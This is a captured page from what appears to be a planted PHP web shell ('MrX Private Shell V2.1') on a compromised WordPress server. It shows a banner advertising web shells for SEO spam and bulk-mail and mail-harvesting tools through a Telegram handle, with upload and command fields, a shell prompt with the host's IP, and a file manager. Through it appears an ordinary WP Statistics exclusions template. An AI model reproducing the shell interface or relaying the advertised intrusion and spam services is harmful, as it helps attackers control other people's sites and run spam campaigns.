__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php
use WP_Statistics\Components\View;
use WP_STATISTICS\Helper;
?>

<div class="postbox-container wps-postbox-full">
    <div class="postbox mb-8">
        <div class="postbox-header--table-title">
            <h2>
                <?php esc_html_e('Exclusions Over Time', 'wp-statistics'); ?>
            </h2>
        </div>
        <div class="inside">
            <?php View::load("components/charts/exclusions"); ?>
        </div>
    </div>
</div>

<div class="postbox-container wps-postbox-full">
    <div class="meta-box-sortables">
        <div class="postbox">
            <div class="inside">
                <?php if (!empty($data['data'])) : ?>
                    <div class="o-table-wrapper">
                        <table width="100%" class="o-table wps-new-table wps-new-table--referrers">
                            <thead>
                                <tr>
                                    <th scope="col" class="wps-pd-l">
                                        <span><?php esc_html_e('Type', 'wp-statistics') ?></span>
                                    </th>
                                    <th scope="col" class="wps-pd-l start">
                                        <span class="wps-order"><?php esc_html_e('Exclusions', 'wp-statistics') ?></span>
                                    </th>
                                    <th scope="col" class="wps-pd-l">
                                        <span class="screen-reader-text"><?php esc_html_e('View excluded percentage', 'wp-statistics'); ?></span>
                                    </th>
                                </tr>
                            </thead>
                            <tbody>
                                <?php foreach ($data['data'] as $item) : ?>
                                    <tr>
                                        <td class="wps-pd-l">
                                            <b><?php echo esc_html(ucwords($item->reason)) ?></b>
                                        </td>
                                        <td class="wps-pd-l start">
                                            <?php echo esc_html(number_format_i18n($item->count)); ?>
                                        </td>
                                        <td class="wps-pd-l">
                                            <?php echo esc_html(Helper::calculatePercentage($item->count, $data['total']) . '%') ?>
                                        </td>
                                    </tr>
                                <?php endforeach; ?>
                            </tbody>
                        </table>
                    </div>
                <?php else : ?>
                    <div class="o-wrap o-wrap--no-data wps-center">
                        <?php esc_html_e('No recent data available.', 'wp-statistics') ?>
                    </div>
                <?php endif; ?>
            </div>
        </div>
    </div>
</div>

Filemanager

Name Type Size Permission Actions
author-analytics Folder 0755
category-analytics Folder 0755
content-analytics Folder 0755
devices Folder 0755
geographic Folder 0755
category.php File 5.63 KB 0644
country.php File 3.02 KB 0644
exclusions.php File 2.9 KB 0644
help-center.php File 19 KB 0644
overview.php File 856 B 0644
privacy-audit.php File 1.91 KB 0644
Filemanager